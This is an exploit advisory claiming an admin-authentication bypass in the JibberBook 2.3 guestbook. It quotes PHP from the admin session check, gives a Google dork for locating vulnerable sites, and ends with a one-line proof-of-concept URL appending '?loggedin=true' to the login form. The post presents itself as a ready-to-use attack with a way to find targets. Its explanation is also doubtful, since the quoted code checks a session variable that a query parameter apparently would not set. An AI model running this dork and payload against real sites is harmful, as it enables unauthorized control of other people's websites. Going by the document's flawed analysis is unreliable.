################################################# # Exploit Title : jibberbook Bypass Admin Vulnerability # # Author : IrIsT.Ir & Sec4Ever.com # # Discovered By : L3b-r1'z # # Home : http://IrIsT.Ir & http://Sec4Ever.com # # P Blob : http://L3b-r1z.com/ # # Software Link : http://jibberbook.com/ # # Security Risk : High # # Version : 2.3 # # Tested on : win\XP # # Dork : allintext: "JibberBook created by chromasynthetic | Powered by MooTools, HTML Purifier, and Akismet" # # 1) SCript # 2) Info Vulnerabilty # 3) P0c # # ################################################# # # 1) SCript: # JibberBook allow the visitor to make comment or any thing like how visitor like website :) # or any msg for admin of site. # # ################################################# # # 2) Info Vulnerability : # This exploit allow attacker to log into the admin panel with out write username or password . # Look Into The File index.php In jibberbook-2.3\admin : # # require_once('inc/secure.php'); # require_once('../inc/includes.php'); # includes(array('admin/actions/load.php', 'admin/actions/transformxml.php')); # # $_SESSION['referer'] = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; # require_once('inc/header.php'); # ?> # We have Require to File Named Secure , Lets Check it :) : # # session_start(); # if (!isset($_SESSION['admin'])) # { # if (is_file(realpath('login_form.php'))) { # $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI'] . 'x') . '/login_form.php'; # } else { # $url = 'http://' . $_SERVER['HTTP_HOST'] . dirname(dirname($_SERVER['REQUEST_URI'] . 'x')) . '/login_form.php'; # } # header("Location: $url"); # exit(); # } else { # $loggedin = true; # } # # The file don't have any secure here :P. # Cz Look To Below Header , We Have else Loggedin = True, its mean if the attacker not admin required to login_form.php # else , Loggedin = true , Admin Redirect to Admin panel :). # # ################################################# # # 3) p0c : # # Site.Com/Admin/Login_form.php?loggedin=true # ################################################# # # # Special Thx To : Irist Team & Sec4Ever Team . # ################################################# # # # Greet'z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector, N4ss1m, hacker-1420. # Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3 Killer Dz. # Over-X <3, And All My Friends. # ################################################# -- Proud To Be Lebanese :D I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3 Killer Dz, Over-X <3, And All My Friends. Sec4ever.com.